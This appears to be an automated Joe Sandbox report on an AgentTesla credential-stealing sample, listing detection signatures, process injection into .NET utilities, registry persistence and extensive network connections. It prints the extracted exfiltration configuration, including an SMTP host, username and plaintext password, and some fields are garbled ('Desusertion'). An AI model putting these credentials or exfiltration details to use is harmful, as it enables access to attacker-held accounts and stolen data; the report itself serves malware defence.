Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Orders#U034fx#U034fl#U034fx#U034f..exe

Overview

General Information

Sample name:New Orders#U034fx#U034fl#U034fx#U034f..exe
renamed because original name is a hash value
Original sample name:New Ordersxlx..exe
Analysis ID:1406723
MD5:ab245cb90a4667db2c06cc8e0b1096b6
SHA1:b3898f3c522f5f84354afe5a36dc8646e60ecb99
SHA256:cb5363031da0d5e48844e4067435084eddc4d6eaae49ae13c612e5b48acb796f
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Connects to many IPs within the same subnet mask (likely port scanning)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Suspicious Outbound Kerberos Connection
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to several IPs in different countries
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Desusertion Ports
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • New Orders#U034fx#U034fl#U034fx#U034f..exe (PID: 7672 cmdline: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe MD5: AB245CB90A4667DB2C06CC8E0B1096B6)
    • MSBuild.exe (PID: 42464 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • InstallUtil.exe (PID: 42472 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • InstallUtil.exe (PID: 42480 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • WerFault.exe (PID: 42608 cmdline: C:\Windows\system32\WerFault.exe -u -p 7672 -s 107896 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • YZbrmyt.exe (PID: 42760 cmdline: "C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 42768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • YZbrmyt.exe (PID: 42996 cmdline: "C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 43004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.fvpumps.com", "Username": "abuse1@fvpumps.com", "Password": "%Babt$D4"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.2587711713.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.2587711713.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.2590372149.000000000301C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000007.00000002.2590372149.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000007.00000002.2590372149.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 3 entries
              SourceRuleDescriptionAuthorStrings
              7.2.InstallUtil.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                7.2.InstallUtil.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  7.2.InstallUtil.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x33934:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x339a6:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33a30:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33ac2:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x33b2c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x33b9e:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x33c34:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x33cc4:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Markus Neis: Data: DesusertionIp: 119.91.214.119, DesusertionIsIpv6: false, DesusertionPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe, Initiated: true, ProcessId: 7672, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 51271
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DesusertionIp: 193.143.1.201, DesusertionIsIpv6: false, DesusertionPort: 4444, EventID: 3, Image: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe, Initiated: true, ProcessId: 7672, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49877
                  Source: Network ConnectionAuthor: Ilyas Ochkov, oscd.community: Data: DesusertionIp: 5.161.103.41, DesusertionIsIpv6: false, DesusertionPort: 88, EventID: 3, Image: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe, Initiated: true, ProcessId: 7672, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 51924
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DesusertionIp: 103.186.8.162, DesusertionIsIpv6: false, DesusertionPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe, Initiated: true, ProcessId: 7672, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49716
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 42472, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YZbrmyt
                  Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 160.248.80.91, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe, Initiated: true, ProcessId: 7672, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49726
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 7.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.fvpumps.com", "Username": "abuse1@fvpumps.com", "Password": "%Babt$D4"}
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exeReversingLabs: Detection: 52%
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exeJoe Sandbox ML: detected
                  Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.9:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.9:50694 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.9:54245 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:55228 version: TLS 1.2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000007.00000002.2594076549.0000000006372000.00000004.00000020.00020000.00000000.sdmp, YZbrmyt.exe, 0000000C.00000000.1826981076.00000000006F2000.00000002.00000001.01000000.0000000A.sdmp, YZbrmyt.exe.7.dr
                  Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000007.00000002.2594076549.0000000006372000.00000004.00000020.00020000.00000000.sdmp, YZbrmyt.exe, 0000000C.00000000.1826981076.00000000006F2000.00000002.00000001.01000000.0000000A.sdmp, YZbrmyt.exe.7.dr

                  Networking

                  barindex
                  Source: global trafficTCP traffic: Count: 11 IPs: 212.110.188.222,212.110.188.189,212.110.188.211,212.110.188.213,212.110.188.202,212.110.188.198,212.110.188.220,212.110.188.193,212.110.188.195,212.110.188.216,212.110.188.207
                  Source: global trafficTCP traffic: Count: 12 IPs: 103.47.93.236,103.47.93.225,103.47.93.219,103.47.93.216,103.47.93.194,103.47.93.25,103.47.93.221,103.47.93.210,103.47.93.242,103.47.93.231,103.47.93.220,103.47.93.252
                  Source: global trafficTCP traffic: Count: 15 IPs: 188.132.222.171,188.132.222.194,188.132.222.141,188.132.222.7,188.132.222.167,188.132.222.9,188.132.222.3,188.132.222.52,188.132.222.5,188.132.222.40,188.132.222.51,188.132.222.39,188.132.222.38,188.132.222.12,188.132.222.14
                  Source: global trafficTCP traffic: Count: 10 IPs: 72.10.160.170,72.10.160.91,72.10.160.90,72.10.160.174,72.10.160.173,72.10.160.172,72.10.160.171,72.10.160.93,72.10.160.92,72.10.160.94
                  Source: global trafficTCP traffic: Count: 10 IPs: 184.178.172.13,184.178.172.23,184.178.172.26,184.178.172.14,184.178.172.25,184.178.172.17,184.178.172.28,184.178.172.3,184.178.172.5,184.178.172.18
                  Source: global trafficTCP traffic: 103.216.51.36 ports 0,2,3,32650,5,6
                  Source: global trafficTCP traffic: 62.171.131.101 ports 41055,25847,44827,29497,2,4,5,7,8
                  Source: global trafficTCP traffic: 45.11.95.166 ports 6012,6014,6003,6002,6005,6004,6015,0,1,4,6,6009,6008
                  Source: global trafficTCP traffic: 173.212.209.216 ports 27138,1,2,3,7,8
                  Source: global trafficTCP traffic: 45.11.95.165 ports 6010,6012,5034,5045,5212,5036,5213,5040,1,2,5,5038,5214,5039,5219
                  Source: global trafficTCP traffic: 207.180.234.220 ports 45876,48963,39323,42823,36946,3,6,7,39737,37736
                  Source: global trafficTCP traffic: 67.213.210.118 ports 2,58703,4,5,9,54924
                  Source: global trafficTCP traffic: 132.148.245.247 ports 7183,1,60349,3,26295,7,8
                  Source: global trafficTCP traffic: 107.180.95.177 ports 64731,63951,1,3,5,6,9,7128,1405
                  Source: global trafficTCP traffic: 148.72.23.56 ports 42312,36111,3260,0,6,60069,9,4833
                  Source: global trafficTCP traffic: 164.92.86.113 ports 64110,63358,62987,57391,1,55651,3,5,7,9,50564,60283
                  Source: global trafficTCP traffic: 162.214.102.195 ports 34227,2,56755,3,4,7,60891,50366
                  Source: global trafficTCP traffic: 203.96.177.211 ports 12183,43839,3,4,5,55005,8,48553,15901
                  Source: global trafficTCP traffic: 107.180.88.173 ports 44568,0,2,5,35774,59820,8,9,36503
                  Source: global trafficTCP traffic: 162.241.6.97 ports 41274,46783,44607,59991,45629,0,31794,4,6,50563,7,60651
                  Source: global trafficTCP traffic: 72.167.38.7 ports 15410,45650,0,1,2,8,9,19802
                  Source: global trafficTCP traffic: 162.241.158.204 ports 63360,41274,46783,44607,59991,1,31794,2,4,52980,50563,7,60651
                  Source: global trafficTCP traffic: 37.187.77.58 ports 64494,14470,49507,21861,59870,0,52593,31355,1,3139,7,18936,13412,13574,37920,19767,10710,29380
                  Source: global trafficTCP traffic: 92.204.135.37 ports 26927,63462,16591,8623,22942,0,62969,1,58604,5,9,20491,55019,34824,32524,33899
                  Source: global trafficTCP traffic: 82.223.121.72 ports 15464,64871,11075,27137,4,5,56002,8,9,4985
                  Source: global trafficTCP traffic: 72.10.160.90 ports 18333,29967,23685,29129,29529,1811,2589,24397,10055,17893,29919,21011,9335,29813,3051,29517,0,1,3601,29197,3,5,9,16205,4337,30951
                  Source: global trafficTCP traffic: 72.10.160.92 ports 28709,5123,5,26077,7,5775
                  Source: global trafficTCP traffic: 72.10.160.170 ports 5385,5321,26887,29585,3,31571,28257,5,8,3801
                  Source: global trafficTCP traffic: 72.10.160.173 ports 0,1,1795,6,7,10677
                  Source: global trafficTCP traffic: 72.10.160.171 ports 2881,26315,1,2,3,31571,5,6,5369
                  Source: global trafficTCP traffic: 62.182.114.164 ports 2,3,5,6,59623,9
                  Source: global trafficTCP traffic: 51.222.241.157 ports 40351,22538,44029,51718,36363,27206,0,1,3,4,5,30011,2563,46286
                  Source: global trafficTCP traffic: 162.214.90.49 ports 51918,0,4,5,58740,7,8,46430
                  Source: global trafficTCP traffic: 128.199.221.91 ports 7176,49865,8004,33383,21605,4,5,6,8,9
                  Source: global trafficTCP traffic: 160.248.80.91 ports 8080,2525,587,5,7,8,80
                  Source: global trafficTCP traffic: 191.103.219.225 ports 48612,1,2,4,6,8
                  Source: global trafficTCP traffic: 163.172.131.178 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 167.172.109.12 ports 39452,46249,39533,37355,40825,3,5,7,41491
                  Source: global trafficTCP traffic: 88.211.85.169 ports 42931,1,2,3,4,9
                  Source: global trafficTCP traffic: 107.180.88.41 ports 37597,62578,24834,2,3,4,58037,57642,8
                  Source: global trafficTCP traffic: 162.214.227.68 ports 43435,48414,63112,45540,34071,55392,0,1,3,4,55029,31042,60433,7,54047,56796,31825,37976,51923,52208
                  Source: global trafficTCP traffic: 148.72.206.84 ports 2536,2,3,5,6,58842
                  Source: global trafficTCP traffic: 207.180.198.241 ports 42581,37443,45718,1,2,57327,4,60148,5,8,17228,37209
                  Source: global trafficTCP traffic: 161.97.163.52 ports 64120,9045,18693,40301,32092,64109,0,30189,1,2,1798,31125,4,22040,34586,6,29631,55109,34916
                  Source: global trafficTCP traffic: 162.241.137.197 ports 0,2,34455,6,60200,36534,61041
                  Source: global trafficTCP traffic: 91.142.222.84 ports 22735,57041,2,3,5,7,12266,55718
                  Source: global trafficTCP traffic: 103.28.121.58 ports 1,2,3,3128,8,80
                  Source: global trafficTCP traffic: 83.151.4.172 ports 47036,0,3,4,6,7
                  Source: global trafficTCP traffic: 41.33.203.115 ports 1,1974,1973,4,7,9
                  Source: global trafficTCP traffic: 131.0.87.225 ports 0,1,2,5,7,52017
                  Source: global trafficTCP traffic: 98.162.25.29 ports 1,3,6,7,9,31679
                  Source: global trafficTCP traffic: 51.158.77.220 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 162.214.225.223 ports 37581,54917,43435,63452,49227,43265,49806,34071,58240,40536,0,36129,53340,4,55029,6,8,9,50753,39824
                  Source: global trafficTCP traffic: 51.222.241.8 ports 36219,1,2,62916,6,9
                  Source: global trafficTCP traffic: 103.35.189.217 ports 1080,1,2,3,3128,8
                  Source: global trafficTCP traffic: 41.217.220.214 ports 0,2,3,32650,5,6
                  Source: global trafficTCP traffic: 86.110.189.118 ports 42539,2,3,4,5,9
                  Source: global trafficTCP traffic: 162.241.50.179 ports 49858,40179,34099,3,6,7,8,48156,37876,53755,31414,35948
                  Source: global trafficTCP traffic: 51.158.108.134 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 163.172.137.49 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 51.158.124.167 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 103.212.93.241 ports 45639,3,4,5,6,9
                  Source: global trafficTCP traffic: 108.181.132.117 ports 34560,0,3,4,5,6
                  Source: global trafficTCP traffic: 146.59.18.246 ports 9755,15860,40975,25810,0,30673,4,5,7,9,49871
                  Source: global trafficTCP traffic: 148.66.130.53 ports 8268,31907,7830,56350,23998,0,3,5,6,47891,13305,54209
                  Source: global trafficTCP traffic: 50.63.12.33 ports 9367,23859,0,2,25492,14738,4,50781,5,22450
                  Source: global trafficTCP traffic: 51.158.108.165 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 51.89.173.40 ports 17982,27887,3100,44719,26545,23313,54570,23854,20435,1,30199,55198,60775,5,8,51511,9,11058,31724
                  Source: global trafficTCP traffic: 206.189.145.23 ports 49614,63625,59867,1,4,6,9
                  Source: global trafficTCP traffic: 167.86.102.169 ports 1,2,3,6,8,16823
                  Source: global trafficTCP traffic: 147.75.92.251 ports 9401,0,1,4,9,10010,10089
                  Source: global trafficTCP traffic: 159.223.71.71 ports 59243,56581,59098,2,3,4,61818,59159,52542,5,51187,60377,9,51616
                  Source: global trafficTCP traffic: 34.93.157.87 ports 21802,0,1,2,8,8514
                  Source: global trafficTCP traffic: 146.59.147.11 ports 62801,0,1,2,6,8
                  Source: global trafficTCP traffic: 213.136.79.177 ports 38772,5189,64556,32930,2,3,35358,7,8,13675
                  Source: global trafficTCP traffic: 217.52.247.86 ports 1976,1,6,1981,7,9
                  Source: global trafficTCP traffic: 45.77.111.135 ports 15082,0,1,2,5,8
                  Source: global trafficTCP traffic: 109.75.34.152 ports 59341,1,3,4,5,9
                  Source: global trafficTCP traffic: 162.214.121.173 ports 64579,44826,35183,4,5,6,33572,7,9,52577,64382
                  Source: global trafficTCP traffic: 20.24.43.214 ports 8123,1,2,3,8,80
                  Source: global trafficTCP traffic: 202.40.181.220 ports 1,2,31247,3,4,7
                  Source: global trafficTCP traffic: 92.205.61.38 ports 21286,4300,36073,1,2,24183,3,4,8
                  Source: global trafficTCP traffic: 162.241.46.40 ports 64353,49401,56241,61579,0,1,4,9,46097
                  Source: global trafficTCP traffic: 46.105.44.29 ports 64523,2,3,4,5,6
                  Source: global trafficTCP traffic: 195.154.43.184 ports 19058,0,1,5,8,9
                  Source: global trafficTCP traffic: 64.227.108.182 ports 14287,1,2,4,7,8
                  Source: global trafficTCP traffic: 41.65.55.10 ports 1976,1,6,1981,7,9
                  Source: global trafficTCP traffic: 208.109.14.49 ports 46047,37377,22881,1,2,50540,8,42072
                  Source: global trafficTCP traffic: 5.252.23.249 ports 1080,1,2,3,3128,8
                  Source: global trafficTCP traffic: 38.54.116.9 ports 8080,1,2,3,3128,8,8118
                  Source: global trafficTCP traffic: 45.117.179.179 ports 6522,14791,27836,2,35942,5,6,55606
                  Source: global trafficTCP traffic: 203.161.32.242 ports 61070,0,4,5,6,50640,52903
                  Source: global trafficTCP traffic: 104.128.103.32 ports 64312,1,2,3,4,6
                  Source: global trafficTCP traffic: 163.172.147.9 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 163.172.165.36 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 132.148.128.88 ports 26606,8595,29745,20317,2,4,5,29313,7,9
                  Source: global trafficTCP traffic: 5.252.23.220 ports 1080,1081,0,1,3128,8
                  Source: global trafficTCP traffic: 58.234.116.197 ports 8193,8197,1,7,8,80,9
                  Source: global trafficTCP traffic: 51.15.234.222 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 94.23.220.136 ports 43751,25256,2,5,6,29295
                  Source: global trafficTCP traffic: 162.241.46.6 ports 41442,62244,60708,34172,0,50062,2,53477,5,6,46097
                  Source: global trafficTCP traffic: 162.241.53.72 ports 57495,57364,3,4,5,6,7,53755,62192
                  Source: global trafficTCP traffic: 162.215.219.157 ports 41697,48117,1,4,7,8
                  Source: global trafficTCP traffic: 147.124.212.31 ports 11070,13276,0,1,24230,7,16844,30479,36779,51825
                  Source: global trafficTCP traffic: 121.139.218.165 ports 0,1,3,4,9,31409
                  Source: global trafficTCP traffic: 216.10.242.18 ports 40571,15881,0,1,4,5,7,30670
                  Source: global trafficTCP traffic: 104.238.111.107 ports 5484,5452,45883,3230,26305,23667,56225,30026,4,5,8,53777,7999
                  Source: global trafficTCP traffic: 51.158.96.66 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 43.255.113.232 ports 8082,8083,5,8,80,84,85
                  Source: global trafficTCP traffic: 103.176.116.171 ports 0,2,3,32650,5,6
                  Source: global trafficTCP traffic: 161.97.170.209 ports 24606,1,2,6,9,62291
                  Source: global trafficTCP traffic: 51.158.105.107 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 147.75.34.86 ports 0,10008,1,10007,3,10000,80,10003
                  Source: global trafficTCP traffic: 104.247.163.246 ports 54094,3825,2,3,5,8
                  Source: global trafficTCP traffic: 185.45.194.176 ports 27639,2,3,6,7,9
                  Source: global trafficTCP traffic: 92.204.134.38 ports 52929,25825,9375,15393,7785,42571,25675,29718,3,1555,56177,5,54467,28695,7,51123,30747,9
                  Source: global trafficTCP traffic: 52.67.10.183 ports 1,2,3,3128,8,80
                  Source: global trafficTCP traffic: 128.199.196.31 ports 21049,0,1,2,27102,7,33661,38832,57715
                  Source: global trafficTCP traffic: 88.202.230.103 ports 17045,8896,0,1,13638,4,5,7
                  Source: global trafficTCP traffic: 51.15.254.129 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 162.144.36.208 ports 27829,38242,2,3,4,27531,8
                  Source: global trafficTCP traffic: 198.23.229.203 ports 15673,1,3,5,6,7
                  Source: global trafficTCP traffic: 132.148.245.169 ports 19483,1,3,7,8,38117
                  Source: global trafficTCP traffic: 72.167.222.113 ports 12581,2,4,8,4125,9,48892
                  Source: global trafficTCP traffic: 67.43.227.228 ports 19599,15079,13141,9039,0,3,26353,9
                  Source: global trafficTCP traffic: 67.43.227.227 ports 28723,25127,23973,9053,32445,1,4,2411,7,14751,8811,4711,1959,13537,12723,29095,10049
                  Source: global trafficTCP traffic: 67.43.227.226 ports 25639,5791,15143,28847,2,3,5,6,9
                  Source: global trafficTCP traffic: 51.79.87.144 ports 41230,8533,22500,41746,0,2,54395,5,18636
                  Source: global trafficTCP traffic: 51.68.164.77 ports 16892,2,3,4,8,54504,32824
                  Source: global trafficTCP traffic: 159.223.166.21 ports 5078,5199,1372,21898,1,2,3,25154,7,47460
                  Source: global trafficTCP traffic: 31.24.44.92 ports 1,2,52173,3,5,7,50687,50109
                  Source: global trafficTCP traffic: 67.43.227.230 ports 23685,25491,1,2,4,5,9
                  Source: global trafficTCP traffic: 94.131.106.196 ports 1080,1,2,3,3128,8
                  Source: global trafficTCP traffic: 75.119.145.169 ports 38023,61344,61553,1,3,4,6
                  Source: global trafficTCP traffic: 43.155.165.196 ports 15673,1,3,5,6,7
                  Source: global trafficTCP traffic: 67.43.228.254 ports 1,2,32221,7,28971,8,9
                  Source: global trafficTCP traffic: 67.43.228.253 ports 14493,7853,26323,24279,0,1,26087,14869,3,31033,28993,5633,1807,6879,3933,9827
                  Source: global trafficTCP traffic: 67.43.228.252 ports 4495,4,1499,5,28695,9
                  Source: global trafficTCP traffic: 67.43.228.251 ports 24279,0,11339,2,26087,6,7,1265,8
                  Source: global trafficTCP traffic: 104.248.158.78 ports 47225,62952,61725,2,5,6,9
                  Source: global trafficTCP traffic: 119.81.71.27 ports 8123,1,2,3,8,80
                  Source: global trafficTCP traffic: 23.95.209.142 ports 15673,1,3,5,6,7
                  Source: global trafficTCP traffic: 92.204.136.149 ports 16691,25137,1,16928,6,53035,9
                  Source: global trafficTCP traffic: 148.72.209.174 ports 38088,39027,1,64938,2,4,29544,6,39458,2906,16203,4734,12446
                  Source: global trafficTCP traffic: 132.148.167.231 ports 46983,3,4,6,8,9
                  Source: global trafficTCP traffic: 198.12.255.193 ports 22785,1,2,6,8,6821,51612
                  Source: global trafficTCP traffic: 51.161.131.84 ports 63055,25843,43712,0,58612,2,4,49202,9,19987
                  Source: global trafficTCP traffic: 117.160.250.163 ports 8080,8081,9990,0,80,9,81,82,9999,8828
                  Source: global trafficTCP traffic: 51.75.126.150 ports 36580,19693,36694,15474,3,11802,4,35632,6,34144,9,4228,37847
                  Source: global trafficTCP traffic: 211.222.252.187 ports 8193,8080,8197,1,3,8,80,9
                  Source: global trafficTCP traffic: 186.215.87.194 ports 8893,6034,8891,6022,0,2,6,6029
                  Source: global trafficTCP traffic: 37.32.98.160 ports 3,5,7,8,8998,37758
                  Source: global trafficTCP traffic: 132.148.129.254 ports 9553,0,1,6,7,8,60781
                  Source: global trafficTCP traffic: 195.154.243.38 ports 4,5,6,8,9,49685
                  Source: global trafficTCP traffic: 64.227.108.25 ports 31908,0,1,3,8,9
                  Source: global trafficTCP traffic: 67.43.236.18 ports 17145,13087,7797,22645,1,30333,4,5,7,5879
                  Source: global trafficTCP traffic: 135.148.10.161 ports 51507,41146,3970,0,31696,1,5,7,6716
                  Source: global trafficTCP traffic: 213.136.78.200 ports 28513,1,2,3,5,8,19925
                  Source: global trafficTCP traffic: 67.43.236.20 ports 3335,31295,26693,5239,31733,8705,6705,24725,20001,25917,13175,6961,3011,12627,1,16829,2,3,2973,5,3389,10363,9,18129
                  Source: global trafficTCP traffic: 72.10.164.178 ports 13341,30717,18067,11251,22017,0,1,1403,10801,2675,6,1431,7,8,13477,1929,30911,5931,29471,10235,5935,8837,5529
                  Source: global trafficTCP traffic: 43.129.228.46 ports 7891,7890,1,7,8,9
                  Source: global trafficTCP traffic: 171.244.140.160 ports 15141,13391,5189,62310,14253,24015,0,3,4,27056,7,37400,53749
                  Source: global trafficTCP traffic: 95.217.104.21 ports 24815,1,2,4,5,8
                  Source: global trafficTCP traffic: 51.158.64.130 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 162.214.197.102 ports 51918,42019,0,4,5,58740,7,8
                  Source: global trafficTCP traffic: 142.4.7.20 ports 43100,0,1,10722,3,4
                  Source: global trafficTCP traffic: 163.172.171.22 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 162.144.121.232 ports 16795,24787,2,27262,6,7,19404
                  Source: global trafficTCP traffic: 91.134.140.160 ports 20896,16487,48962,49687,2572,56495,57320,27207,9141,0,32896,32588,53012,2,11946,30895,7,8879,5401,12217,49042
                  Source: global trafficTCP traffic: 160.153.245.187 ports 38586,3,35138,59786,5,6,8,6116,5436,31745
                  Source: global trafficTCP traffic: 72.195.34.60 ports 1,2,3,7,9,27391
                  Source: global trafficTCP traffic: 43.131.245.216 ports 15673,1,3,5,6,7
                  Source: global trafficTCP traffic: 170.244.64.12 ports 31476,1,3,4,6,7
                  Source: global trafficTCP traffic: 45.81.232.17 ports 27855,59421,54393,9165,23711,0,4,5,6,7,23363,47056,21481,17639,14669,48085
                  Source: global trafficTCP traffic: 92.205.110.118 ports 42086,18374,15430,0,1,3,26570,4,5,53903
                  Source: global trafficTCP traffic: 51.15.142.4 ports 1,3,6,7,9,16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 49478
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 30951
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 31033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 1080
